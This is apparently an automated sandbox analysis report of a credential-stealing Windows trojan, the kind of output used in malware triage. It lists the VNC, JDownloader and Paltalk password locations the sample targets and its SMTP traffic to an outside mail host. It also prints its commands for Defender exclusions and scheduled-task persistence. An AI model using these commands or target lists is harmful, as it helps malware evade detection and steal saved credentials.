Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Username
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: EncryptedPassword
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Mailbird
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: RealVNC 4.x
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Password
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: RealVNC 3.x
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: SOFTWARE\RealVNC\vncserver
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Password
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: RealVNC 4.x
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Password
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: RealVNC 3.x
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Software\ORL\WinVNC3
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Password
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: TightVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Software\TightVNC\Server
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Password
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: TightVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Software\TightVNC\Server
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: PasswordViewOnly
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: TightVNC ControlPassword
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Software\TightVNC\Server
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ControlPassword
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: TigerVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Software\TigerVNC\Server
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Password
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: UltraVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ProgramFiles(x86)
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: passwd
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: UltraVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ProgramFiles(x86)
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: passwd2
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: UltraVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ProgramFiles
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: passwd
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: UltraVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ProgramFiles
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: passwd2
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: UltraVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ProgramFiles
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: passwd
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: UltraVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ProgramFiles
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: passwd2
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: UltraVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ProgramFiles(x86)
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: passwd
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: UltraVNC
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: ProgramFiles(x86)
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: passwd2
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: JDownloader 2.0
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: JDownloader 2.0\cfg
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: JDownloader 2.0\cfg
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Paltalk
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: nickname
Source: LisectAVT_2403002A_16.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: LisectAVT_2403002A_16.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: FPzK.pdb source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr
Source: Binary string: FPzK.pdbSHA256 source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 4x nop then jmp 05A8CF23h | 0_2_05A8CF7B
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Code function: 4x nop then jmp 0795C1ACh | 10_2_0795C204
Source: global traffic | TCP traffic: 192.168.2.4:49735 -> 199.79.62.115:587
Source: Joe Sandbox View | IP Address: 199.79.62.115
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mail.mbarieservicesltd.com
Source: global traffic | DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: LisectAVT_2403002A_16.exe, 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.mbarieservicesltd.com
Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1722615685.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000A.00000002.1786665418.000000000323E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1729697957.000000000757A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs LisectAVT_2403002A_16.exe
Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1718798256.00000000010FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs LisectAVT_2403002A_16.exe
Source: LisectAVT_2403002A_16.exe, 00000000.00000000.1647863281.0000000000BDA000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFPzK.exe< vs LisectAVT_2403002A_16.exe
Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1730117949.0000000007B90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs LisectAVT_2403002A_16.exe
Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs LisectAVT_2403002A_16.exe
Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs LisectAVT_2403002A_16.exe
Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1722615685.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs LisectAVT_2403002A_16.exe
Source: LisectAVT_2403002A_16.exe, 00000009.00000002.2898676233.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs LisectAVT_2403002A_16.exe
Source: LisectAVT_2403002A_16.exe | Binary or memory string: OriginalFilenameFPzK.exe< vs LisectAVT_2403002A_16.exe
Source: LisectAVT_2403002A_16.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NxmtwwVGOtEdjd.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, O.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, O.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, P.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, N.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, Icw0P7E5I25dt8WiCY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.cs | Security API names: _0020.SetAccessControl
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, Icw0P7E5I25dt8WiCY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.cs | Security API names: _0020.SetAccessControl
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/15@2/1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | File created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Mutant created: \Sessions\1\BaseNamedObjects\nrmexAQCdAxIpmz
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | File created: C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp
Source: LisectAVT_2403002A_16.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | File read: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
Source: unknown | Process created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Process created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Process created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: dwrite.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: ntmarta.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
